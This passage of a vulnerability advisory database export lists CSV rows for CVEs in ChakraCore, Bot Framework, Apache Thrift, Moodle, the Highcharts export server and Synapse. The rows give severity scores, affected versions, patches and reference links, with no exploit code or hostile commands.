+1.4.0,GHSA-rh4p-g7x6-8pqg,2021-03-18T22:33:32Z,2021-03-29T20:59:09Z,,['CVE-2019-1062'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1092, CVE-2019-1103, CVE-2019-1106, CVE-2019-1107.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1062'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1062'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:33:32Z', 'nvd_published_at': '2019-07-15T19:15:00Z'}"
+1.4.0,GHSA-fvcj-hvfw-7f2v,2022-07-05T17:37:33Z,2021-03-08T15:49:53Z,,['CVE-2021-1725'],Improper Authentication,"### Impact
+A maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an attacker to have internal knowledge of the bot.
+
+### Patches
+The problem has been patched in all affected versions. Please see the list of patched versions for the most appropriate one for your individual case.
+
+### Workarounds
+Users who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator, which throws an exception if the Claims are Skill Claims.
+
+For detailed instructions, see the link in the References section.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botbuilder-dotnet)
+* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.7.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.8.0'}, {'fixed': '4.8.1'}]}], 'versions': ['4.8.0']}, {'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.9.0'}, {'fixed': '4.9.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.10.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/microsoft/botbuilder-js/security/advisories/GHSA-fvcj-hvfw-7f2v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-1725'}, {'type': 'WEB', 'url': 'https://aka.ms/SkillClaimsValidationJavascript'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/botframework-connector'}]","{'cwe_ids': ['CWE-200', 'CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-08T15:47:09Z', 'nvd_published_at': '2021-01-12T20:15:00Z'}"
+1.4.0,GHSA-hrmm-f4j8-8vxc,2021-03-18T21:56:56Z,2021-03-29T21:00:11Z,,['CVE-2019-0922'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0922'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/a9ab1aae31078e80593b9227db11d316c2239ef3'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0922'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:56:56Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-g2fg-mr77-6vrm,2022-02-08T21:37:21Z,2021-03-12T21:33:55Z,,['CVE-2020-13949'],Uncontrolled Resource Consumption in Apache Thrift,"In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.thrift:libthrift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.3'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13949'}, {'type': 'WEB', 'url': 'https://github.com/apache/hbase/pull/2958'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/hbase'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r01b34416677f1ba869525e1b891ac66fa6f88c024ee4d7cdea6b456b@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02ba8db500d15a5949e9a7742815438002ba1cf1b361bdda52ed40ca@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02f7771863383ae993eb83cdfb70c3cb65a355c913242c850f61f1b8@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0372f0af2dad0b76fbd7a6cfdaad29d50384ad48dda475a5026ff9a3@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08a7bd19470ef8950d58cc9d9e7b02bc69c43f56c601989a7729cce5@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1084a911dff90b2733b442ee0f5929d19b168035d447f2d25f534fe4@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r117d5d2b08d505b69558a2a31b0a1cf8990cd0385060b147e70e76a9@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r12090c81b67d21a814de6cf54428934a5e5613fde222759bbb05e99b@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r13f40151513ff095a44a86556c65597a7e55c00f5e19764a05530266@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r143ca388b0c83fe659db14be76889d50b453b0ee06f423181f736933@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1456eab5f3768be69436d5b0a68b483eb316eb85eb3ef6eba156a302@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1504886a550426d3c05772c47b1a6350c3235e51fd1fdffbec43e974@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r15eed5d21e16a5cce810c1e096ffcffc36cd08c2f78ce2f9b24b4a6a@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r179119bbfb5610499286a84c316f6789c5afbfa5340edec6eb28d027@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17cca685ad53bc8300ee7fcfe874cb784a222343f217dd076e7dc1b6@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r18732bb1343894143d68db58fe4c8f56d9cd221b37f1378ed7373372@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r191a9279e2863b68e5496ee4ecd8be0d4fe43b324b934f0d1f106e1d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r196409cc4df929d540a2e66169104f2b3b258d8bd96b5f083c59ee51@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1dea91f0562e0a960b45b1c5635b2a47b258b77171334276bcf260a7@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fb2d26b81c64ce96c4fd42b9e6842ff315b02c36518213b6c057350@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r20f6f8f8cf07986dc5304baed3bf4d8a1c4cf135ff6fe3640be4d7ec@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r278e96edc4bc13efb2cb1620a73e48f569162b833c6bda3e6ea18b80@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27b7d3d95ffa8498899ef1c9de553d469f8fe857640a3f6e58dba640@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r286e9a13d3ab0550042997219101cb87871834b8d5ec293b0c60f009@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r298a25228868ebc0943d56c8f3641212a0962d2dbcf1507d5860038e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2d180180f37c2ab5cebd711d080d01d8452efa8ad43c5d9cd7064621@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ed66a3823990306b742b281af1834b9bc85f98259c870b8ffb13d93@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f6a547f226579f542eb08793631d1f2d47d7aed7e2f9d11a4e6af9f@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3550b61639688e0efbc253c6c3e6358851c1f053109f1c149330b535@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3a1291a7ab8ee43db87cb0253371489810877028fc6e7c68dc640926@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3de0e0c26d4bd00dd28cab27fb44fba11d1c1d20275f7cce71393dd1@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3e31ec7e8c39db7553be4f4fd4d27cf27c41f1ba9c985995c4ea9c5a@%3Cnotifications.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f3e1d562c528b4bafef2dde51f79dd444a4b68ef24920d68068b6f9@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f97dbbbb1b2a7324521208bb595392853714e141a37b8f68d395835@%3Cnotifications.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r409e296c890753296c544a74d4de0d4a3ce719207a5878262fa2bd71@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r421a9a76811c1aed7637b5fe5376ab14c09ccdd7b70d5211d6e76d1e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r43dc2b2e928e9d845b07ac075634cb759d91bb852421dc282f87a74a%40%3Cdev.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r449288f6a941a2585262e0f4454fdefe169d5faee33314f6f89fab30@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d90b6d8de9697beb38814596d3a0d4994fa9aba1f6731a2c648d3ae@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4fa53eacca2ac38904f38dc226caebb3f2f668b2da887f2fd416f4a7@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r515e01a30443cfa2dbb355c44c63149869afd684fb7b0344c58fa67b@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r533a172534ae67f6f17c4d33a1b814d3d5ada9ccd4eb442249f33fa2@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r587b4a5bcbc290269df0906bafba074f3fe4e50d4e959212f56fa7ea@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r62aa6d07b23095d980f348d330ed766560f9a9e940fec051f534ce37@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r635133a74fa07ef3331cae49a9a088365922266edd58099a6162a5d3@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r668aed02e287c93403e0b8df16089011ee4a96afc8f479809f1fc07f@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6990c849aeafe65366794bfd002febd47b7ffa8cf3c059b400bbb11d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r699c031e6921b0ad0f943848e7ba1d0e88c953619d47908618998f76@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ae3c68b0bfe430fb32f24236475276b6302bed625b23f53b68748b5@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ba4f0817f98bf7c1cb314301cb7a24ba11a0b3e7a5be8b0ae3190b0@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6c5b7324274fd361b038c5cc316e99344b7ae20beae7163214fac14d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r72c3d1582d50b2ca7dd1ee97e81c847a5cf3458be26d42653c39d7a6@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r741364444c3b238ab4a161f67f0d3a8f68acc517a39e6a93aa85d753@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74eb88b422421c65514c23cb9c2b2216efb9254317ea1b6a264fe6dc@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7597683cc8b87a31ec864835225a543dad112d7841bf1f17bf7eb8db@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7ae909438ff5a2ffed9211e6ab0bd926396fd0b1fc33f31a406ee704@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r812915ecfa541ad2ca65c68a97b2c014dc87141dfaefc4de85049681@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r850522c56c05aa06391546bdb530bb8fc3437f2b77d16e571ae73309@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r869331422580d35b4e65bd74cf3090298c4651bf4f31bfb19ae769da@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r886b6d9a89b6fa0aafbf0a8f8f14351548d6c6f027886a3646dbd075@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8897a41f50d4eb19b268bde99328e943ba586f77779efa6de720c39f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r890b8ec5203d70a59a6b1289420d46938d9029ed706aa724978789be@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89fdd39965efb7c6d22bc21c286d203252cea476e1782724aca0748e@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8dfbefcd606af6737b62461a45a9af9222040b62eab474ff2287cf75@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90b4473950e26607ed77f3d70f120166f6a36a3f80888e4eeabcaf91@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r93f23f74315e009f4fb68ef7fc794dceee42cf87fe6613814dcd8c70@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r950ced188d62320fdb84d9e2c6ba896328194952eff7430c4f55e4b0@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r995b945cc8f6ec976d8c52d42ba931a688b45fb32cbdde715b6a816a@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b51e7c253cb0989b4c03ed9f4e5f0478e427473357209ccc4d08ebf@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ec75f690dd60fec8621ba992290962705d5b7f0d8fd0a42fab0ac9f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra3f7f06a1759c8e2985ed24ae2f5483393c744c1956d661adc873f2c@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra7371efd8363c1cd0f5331aafd359a808cf7277472b8616d7b392128@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9f7c755790313e1adb95d29794043fb102029e803daf4212ae18063@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/race178e9500ab8a5a6112667d27c48559150cadb60f2814bc67c40af@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad635e16b300cf434280001ee6ecd2ed2c70987bf16eb862bfa86e02@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rada9d2244a66ede0be29afc5d5f178a209f9988db56b9b845d955741@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae95c2234b6644bfd666b2671a1b42a09f38514d0f27cca3c7d5d55a@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raea1bb8cf2eb39c5e10543f547bdbbdbb563c2ac6377652f161d4e37@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb3574bc1036b577b265be510e6b208f0a5d5d84cd7198347dc8482df@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb44ec04e5a9b1f87fef97bb5f054010cbfaa3b8586472a3a38a16fca@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51977d392b01434b0b5df5c19b9ad5b6178cfea59e676c14f24c053@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb91c32194eb5006f0b0c8bcdbd512c13495a1b277d4d51d45687f036@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc5cad06a46d23253a3c819229efedecfc05f89ef53f5fdde77a86d6@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbfbb81e7fb5d5009caf25798f02f42a7bd064a316097303ba2f9ed76@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc48ab5455bdece9a4afab53ca0f1e4f742d5baacb241323454a87b4e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7a241e0af086b226ff9ccabc4a243d206f0f887037994bfd8fcaaeb@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7a79b08822337c68705f16ee7ddcfd352313b836e78a4b86c7a7e3d@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc896ce7761999b088f3adabcb99dde2102b6a66130b8eec6c8265eab@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcace846f74ea9e2af2f7c30cef0796724aa74089f109c8029b850163@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcae4c66f67e701db44d742156dee1f3e5e4e07ad7ce10c740a76b669@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcdf62ecd36e39e4ff9c61802eee4927ce9ecff1602eed1493977ef4c@%3Cuser.thrift.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0734d91f16d5b050f0bcff78b4719300042a34fadf5e52d0edf898e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd370fdb419652c5219409b315a6349b07a7e479bd3f151e9a5671774@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd49d53b146d94a7d3a135f6b505589655ffec24ea470e345d31351bb@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd78cdd87d84499a404202f015f55935db3658bd0983ecec81e6b18c6@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdc8e0f92d06decaee5db58de4ded16d80016a7db2240a8db17225c49@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdcf00186c34d69826d9c6b1f010136c98b00a586136de0061f7d267e@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf568168e7f83871969928c0379813da6d034485f8b20fa73884816d6@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf603d25213cfff81d6727c259328846b366fd32a43107637527c9768@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf65df763f630163a3f620887efec082080555cee1adb0b8eaf2c7ddb@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf741d08c7e0ab1542c81ea718467422bd01159ed284796a36ad88311@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf75979ae0ffd526f3afa935a8f0ee13c82808ea8b2bc0325eb9dcd90@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfbb01bb85cdc2022f3b96bdc416dbfcb49a2855b3a340aa88b2e1de9@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-32'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T19:44:27Z', 'nvd_published_at': '2021-02-12T20:15:00Z'}"
+1.4.0,GHSA-5x33-h32w-6vr2,2021-03-24T23:14:52Z,2021-03-29T20:43:15Z,,['CVE-2020-25628'],Cross site-scripting (XSS) moodle,"The filter in the tag manager required extra sanitizing to prevent a reflected XSS risk. This affects 3.9 to 3.9.1, 3.8 to 3.8.4, 3.7 to 3.7.7, 3.5 to 3.5.13 and earlier unsupported versions. Fixed in 3.9.2, 3.8.5, 3.7.8 and 3.5.14.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25628'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/e8632a4ad0b4da3763cbbe5949594aa449b483bb'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=410840'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-69340'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:14:52Z', 'nvd_published_at': '2020-12-08T01:15:00Z'}"
+1.4.0,GHSA-hfwx-c7q6-g54c,2021-03-12T22:32:16Z,2021-03-12T23:04:46Z,,[],Vulnerability allowing for reading internal HTTP resources,"### Impact
+
+The vulnerability allows for reading and outputting files served by other services on the internal network in which the export server is hosted. If the export server is exposed to the internet, this potentially allows a malicious user to gain read access to internal web-resources.
+
+The impact is limited to internal services that serve content via. HTTP(S), and requires the attacker to know internal hostnames/IP addresses.
+
+The previous versions have been marked as deprecated on NPM.
+
+### Patches
+
+Version 2.1.0 released alongside this security advisory addresses the issue. **Please note that this release is not backwards compatible out of the box. See the [changelog](https://github.com/highcharts/node-export-server/blob/master/CHANGELOG.md) for details.**
+
+Additionally, it's also recommended to upgrade to the latest version of Highcharts to get the added input sanitation implemented in version 9.0 and later.
+
+### Workarounds
+
+There are no known workarounds to the issue - an upgrade to version 2.1.0 is required.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [the export server issue tracker](https://github.com/highcharts/node-export-server/issues)
+* Email us at [security@highsoft.com](mailto:security@highsoft.com)",[],"[{'package': {'ecosystem': 'npm', 'name': 'highcharts-export-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.30'}}]","[{'type': 'WEB', 'url': 'https://github.com/highcharts/node-export-server/security/advisories/GHSA-hfwx-c7q6-g54c'}, {'type': 'WEB', 'url': 'https://github.com/highcharts/node-export-server/commit/53fa992a96785a5a08390e55ec30ea2ad217dfe6'}, {'type': 'WEB', 'url': 'https://github.com/highcharts/node-export-server/blob/master/CHANGELOG.md#210'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/highcharts-export-server'}]","{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:32:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2hwx-mjrm-v3g8,2021-08-31T21:06:54Z,2021-03-01T19:34:54Z,,['CVE-2021-21274'],Denial of service attack via .well-known lookups,"### Impact
